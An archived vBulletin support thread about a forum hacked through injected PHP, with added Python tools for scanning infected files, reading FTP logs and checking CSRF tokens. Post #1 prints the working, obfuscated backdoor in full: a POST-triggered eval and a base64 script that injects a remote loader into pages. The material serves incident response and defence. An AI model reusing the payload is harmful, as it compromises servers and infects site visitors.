The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
HACKED - Make sure you are secure
Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com, to see a PHP syntax error on line 1...
I open up my index file and find this:
Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected.
My database was not touched, but I had to delete the installation of VB, install a fresh copy and connect it to the database. I did some research on this, and results are slim, but it's attacking other programs as well. osCommerce for example: http://forums.oscommerce.com/lofiver...p?t321418.html Anyone seen this before? I was more in a panic to get my site up; now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or whatever can be done.
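An added example, not code from the thread or from vBulletin, that scans a web root for the markers of the block quoted above: the POST-triggered eval, a base64 string beginning `PHNjcmlwd` (how the encoding of any `<script...` string starts), and the `tmp_lkojfghx` output-buffer and error-handler hooks, and that strips a payload glued in front of the file's own `<?php` (the `?><?php` seam on line 1). The indicator names, function names and sample file contents are my own constructions.

```python
"""Scan for the prepended PHP injection quoted in the thread and strip it."""
import os
import re

# Markers taken from the quoted block. 'PHNjcmlwd' is how base64 of any string
# starting with "<script" begins; the tmp_lkojfghx names are the payload's own.
STRONG = {
    "post_eval": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\["),
    "b64_script": re.compile(r"base64_decode\s*\(\s*['\"]PHNjcmlwd"),
    "ob_hook": re.compile(r"ob_start\s*\(\s*['\"]tmp_lkojfghx['\"]"),
    "err_hook": re.compile(r"set_error_handler\s*\(\s*['\"]tmp_lkojfghx2['\"]"),
}
# Weak on its own: a legitimate file rarely re-opens PHP on line 1, but a
# payload glued in front of the original "<?php" always produces this seam.
DOUBLE_OPEN = re.compile(r"\?>\s*(<\?php)")

def scan_php_source(src):
    """Names of the strong indicators present in one file's contents."""
    return [name for name, rx in STRONG.items() if rx.search(src)]

def strip_prepended_payload(src):
    """If line 1 is 'payload ?><?php', return the file from the real opening
    tag onward; otherwise return src unchanged (never strip a clean file)."""
    first_line = src.split("\n", 1)[0]
    m = DOUBLE_OPEN.search(first_line)
    if m and scan_php_source(first_line[: m.start(1)]):
        return src[m.start(1):]
    return src

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and map each flagged file to the indicators it matched."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples: a clean file and a shortened, non-functional imitation of
# the quoted payload sitting in front of the application's own "<?php".
CLEAN = "<?php\n// application file\necho 'hello';\n"
INFECTED = ("<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['t']))"
            "eval($_POST['t']);define('X',base64_decode('PHNjcmlwdCBsYW5n'));"
            "ob_start('tmp_lkojfghx');} ?>" + CLEAN)
```

Run `scan_tree("/path/to/public_html")` against a copy of the tree before deleting anything; the flagged list is what you compare against your backup.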
#2
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.
#3
I would have thought, though, that if they got into the server through a backdoor or something, they would have affected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touched (and have been on there for a very long time).
Here is the list of my mods. I have ibProArcade v.2.6.8, whose file structure I noticed was changed. Here is a list of my other mods:
Admin Log In As User
Cyb - Advanced Permissions Based on Post Account
Fake User (adds a couple guests)
GTSmilieBox
Panic Button Plus
Mood
vB Ad Management
vBadvanced CMPS
vbSEO Site Map
Welcome Headers
--------------- Added 5 Apr 2009, 07:05 UTC ---------------
Maybe someone can chime in? This guy is getting FTP access. I have formatted all my PCs to make sure I don't have a virus, and my host is looking through everything as well. The thing that caught my interest:
Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c
Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, and I also disabled my FTP server...
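The four log lines above are in the standard xferlog layout, and they show the tell-tale sequence of a file being downloaded (`o`), edited and pushed back (`i`) a second later, larger than before. As an added example (not from the thread or from any FTP server's tooling), this parses such lines and flags that download-then-reupload pair per remote host and path; the sample log is the poster's four lines, and the function names are my own.

```python
"""Spot the download-then-reupload pattern in FTP xferlog entries."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Standard xferlog layout: timestamp, transfer-time, remote-host, size, path,
# type, special-action, direction (i=in, o=out, d=delete), access-mode, user,
# service, auth-method, auth-user-id, completion-status.
XFERLOG_RE = re.compile(
    r"^(?P<time>\w{3} \w{3} \d{2} \d{2}:\d{2}:\d{2} \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<special>\S+) (?P<direction>[iod]) "
    r"(?P<access>[arg]) (?P<user>\S+) (?P<service>\S+) (?P<auth>[01]) (?P<authid>\S+) "
    r"(?P<status>[ci])$"
)

# The four lines quoted in the post above, exactly as the poster gave them.
SAMPLE_LOG = """\
Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c
"""

def parse_xferlog(lines):
    """One dict per well-formed line; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = XFERLOG_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["time"] = datetime.strptime(ev["time"], "%a %b %d %H:%M:%S %Y")
            ev["size"] = int(ev["size"])
            events.append(ev)
    return events

def find_modify_reupload(events, window=timedelta(minutes=10)):
    """Flag files a host downloaded ('o') then pushed back ('i') within `window`."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["host"], ev["user"], ev["path"])].append(ev)
    hits = []
    for (host, user, path), evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        for out, back in zip(evs, evs[1:]):
            if (out["direction"], back["direction"]) == ("o", "i") \
                    and back["time"] - out["time"] <= window:
                hits.append({"host": host, "user": user, "path": path,
                             "when": back["time"],
                             "delta_bytes": back["size"] - out["size"]})  # growth = injected bytes
    return hits
```

A positive `delta_bytes` on every hit from one host, as here (251 and 1781 bytes), is the signature of an FTP session editing files in place with stolen credentials rather than a server-side exploit.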
#4
It is related to your server administration; you did not do anything wrong, and neither did your products...
In short, it is a base64-encoded fake Yahoo counter script that is injected into HTML code. The script looks for files in the server's temporary directory and tries to use them. Pretty sure the hacker uploaded a simple PHP shell onto your insecure server. Personally, I would change host. It is obvious they don't care about security.
#5
The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole; if not, I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well. Considering it is a VPS, I have multiple accounts on there, including another site for VB. Why is this guy going after this site?
#6
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non-root access to the dedicated server. For example, I could set up a file with the extension .gif that is in fact this script:
PHP Code:
Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault or the vBulletin developers' fault if your host runs unsecured boxes.
#7
I agree - I took your advice and moved - I can't let this sit over my head :erm:
#8
If you're on a VPS, chances are good that security and management rely on you or your server admin.
Your server security is only as secure as your least secure admin/server manager.
#9
Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.
All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server, where he controls the HTML and JavaScript. In his HTML there, all he needs is an img tag with src= any URL at your vb3 site, and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request. img isn't the only tag, either; script tags work too, as do CSS (link) tags, and a few others.
#10
That's why vBulletin introduced CSRF protection.
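A small model, added here and not vBulletin's code, of the problem post #9 describes and the check post #10 refers to: the browser attaches the session cookie to any request for the site, including one an `<img src=...>` on a foreign page triggers, so a state-changing endpoint must also demand a per-session token that only the site's own pages can embed. The names `SESSIONS`, `securitytoken`, `handle_action` and the session store are assumptions for this example.

```python
"""Cookie-only authentication versus a per-session CSRF token, modelled in
plain functions. Names here are assumptions, not vBulletin's own code."""
import hmac
import secrets

SESSIONS = {}  # session cookie value -> {"user": name, "csrf": per-session token}

def login(user):
    """Issue a session cookie and a random token bound to that session."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid

def render_form(sid):
    """What the site's own page embeds as a hidden field. A page served from the
    attacker's host never sees this value; the browser only forwards the cookie."""
    return {"securitytoken": SESSIONS[sid]["csrf"]}

def handle_action(cookies, form, require_token=True):
    """A state-changing endpoint. The cookie proves who the browser is logged in
    as, but says nothing about which page authored the request; the token does."""
    sid = cookies.get("sessionid")
    if sid not in SESSIONS:
        return 401, "not logged in"
    if require_token:
        expected = SESSIONS[sid]["csrf"]
        supplied = form.get("securitytoken", "")
        if not hmac.compare_digest(expected, supplied):  # constant-time compare
            return 403, "security token missing or wrong"
    return 200, "action performed as " + SESSIONS[sid]["user"]

def simulate_image_tag_request(sid, require_token):
    """An <img>/<script>/<link> fetch from a foreign page: the victim's cookie
    rides along, but no form body and therefore no token. With require_token=False
    (the situation post #9 describes) it succeeds as the victim; with True it is refused."""
    return handle_action({"sessionid": sid}, {}, require_token)
```

Keeping state changes off GET handlers is the complementary half of the fix, since an `img` fetch is always a GET.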